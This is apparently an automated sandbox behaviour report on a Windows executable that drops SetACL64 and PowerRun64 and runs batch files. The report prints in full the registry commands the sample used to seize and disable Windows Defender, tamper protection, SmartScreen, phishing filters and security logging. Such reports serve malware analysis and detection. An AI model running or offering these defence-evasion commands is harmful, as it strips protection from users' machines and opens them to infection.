Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeFile created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeJump to dropped file
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeFile created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\uxdabweej.exeJump to dropped file
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeFile created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeFile created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\win_version_csharp.exeJump to dropped file
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeFile created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\PowerRun64.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C1741DAC GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00007FF7C1741DAC
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\uxdabweej.exeJump to dropped file
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\win_version_csharp.exeJump to dropped file
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\PowerRun64.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_4-42631
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe TID: 2548Thread sleep count: 127 > 30Jump to behavior
Source: C:\Windows\SysWOW64\reg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\reg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeCode function: 0_2_00405C40 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C40
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeCode function: 0_2_00406891 FindFirstFileW,FindClose,0_2_00406891
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C17296D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF7C17296D0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C175C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,4_2_00007FF7C175C76C
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C173CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF7C173CF15
Source: SetACL64.exe, 00000008.00000002.2145654108.00000228F7926000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW:
Source: SetACL64.exe, 00000008.00000002.2145654108.00000228F7926000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: SetACL64.exe, 00000004.00000002.2140001503.0000013729204000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 00000007.00000002.2144009034.0000012E75357000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 00000009.00000002.2146824889.000002B1092D6000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 0000000A.00000002.2151273111.000001F6DF896000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 0000000B.00000002.2152929828.0000027E66337000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 0000000D.00000002.2155754104.000001D50426F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SetACL64.exe, 0000000C.00000002.2154260371.000001F959057000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllgg
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeAPI call chain: ExitProcess graph end nodegraph_0-3464
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C17486C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF7C17486C8
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C175D744 GetProcessHeap,4_2_00007FF7C175D744
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C17486C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF7C17486C8
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C1742AE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF7C1742AE0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C1742E8C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF7C1742E8C
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C1743034 SetUnhandledExceptionFilter,4_2_00007FF7C1743034
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn.batJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn1.batJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C17380F6 SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,SetSecurityDescriptorDacl,SetSecurityDescriptorSacl,GetLastError,MakeSelfRelativeSD,MakeSelfRelativeSD,GetLastError,_invalid_parameter_noinfo_noreturn,4_2_00007FF7C17380F6
